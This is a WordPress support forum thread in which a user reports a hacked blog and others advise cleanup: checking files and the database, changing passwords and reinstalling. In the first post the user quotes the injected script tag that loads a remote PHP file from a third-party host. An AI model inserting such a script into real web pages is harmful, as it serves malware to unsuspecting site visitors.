Posted 2 years ago #
Hi there,
I have recently noticed that my blog - blog.anuspasoap.com has been hacked , since firefox and chrome says that this sites has been attacked.
Also when I check the source code of the home page there is script which I can see - <script src=http://tpisnj.com/parkhotel/KIDTYPE3.php ></script> I am not able to see this script in header.php
What should I do? Its also affecting my site http://www.anuspasoap.com , the blog for which is the sub domain.
Please help.
Mrunal
Posted 2 years ago #
search the forum for hacked
http://wordpress.org/search/hacked?forums=1
or look here
http://codex.wordpress.org/FAQ_My_site_was_hacked
there is alot of detailed info availabale already, it's hard to repeat it all.
Posted 2 years ago #
See FAQ: My site was hacked « WordPress Codex and How to Completely Clean a Hacked WordPress Install. Change your FTP passwords, and look for hidden WordPress adminstrators.
Posted 2 years ago #
@Rvoodoo - I have been through the links u have mentioned, but can you guide me onto how do I remove that script which I have mentioned above.
@songdogtech - thanks for your advice, same request to you too, where do I find this script so that I can delete it.
Mrunal
Posted 2 years ago #
Can't guide you really...I followed those links...
There is no simple answer
You may have to go through every file and folder on your host, your database, etc. Change your passwords, all of them. Clean everything, then change em again. As long as you are hacked, your passwords are vulnerable.
I had to reinstall all my programs on my server
5wp installs, 1 SMF form, 1 wiki, 1 media upload program
Then I had to comb through all my folders for strage php files that had been uploaded (found 2, buried real deep).
My server logs show me everything that happens, and they were a lifesaver...I scanned them all for any suspicious activity (that took alot of time)
Its a pain, and there is no simple solution
Posted 2 years ago #
Try Search and Replace « WordPress Plugins to search in your database. But searching with PHPMyAdmin is more complete: How To Completely Clean Your Hacked WordPress Installation | Smackdown!
Posted 2 years ago #
@ Songdogtech - Search and Replace is not compatibel with 2.8.6 ....let me see if I can find some other plugin like this one.
Posted 2 years ago #
Now this is what I plan to do tomm -
1. I will uninstall wordpress from my server. Even delete the database to which it was connected.
2. There were 15 article on the blog, I have them on my macbook, which I can add them back later.
3. Check my main site, to know if its affected. If it is then, have it cleant first.
4. Re-install WordPress fresh.
5. Add articles from scratch, in the same sequence as they were before and make the blog look like what it looked earlier.
Is this a good way to go about it...since I dont have a lot of time to spend on this issue.
This sounds like a good way to go about it, especially if you delete the database and the file folder that contained WordPress. However, do check out your #3 point - if there is a hack, then it might not be contained just in wordpress.
Sorry this happened to you. It sucks to get hacked.
Posted 2 years ago #
@mrunal13
you could even export your posts from Tools - Export to an XML file. checking this for 'strange' code should be easy with 15 posts. On a new install you can import this file to get all posts back.
I also would ftp the full site content to my pc to have a backup of your wp-content folder. BUT DO NOT JUST UPLOAD THIS FOLDER TO A NEW INSTALLATION, there might be malicious files in there.
Did you ever just switch to default theme and look if this code is inserted there too?
Posted 2 years ago #
@Ancawonka - The blog and everything related to wordpress id out of server. Now Im working on Point # 3 and life is not so easy.
@ Joern - I shifted back to the default plugin, but that strange code was still there.....so had to remove my blog and everything related to wordpress....hopefully the main site is sorted quickly and I can get back to Arthemia soon.
This topic has been closed to new replies.
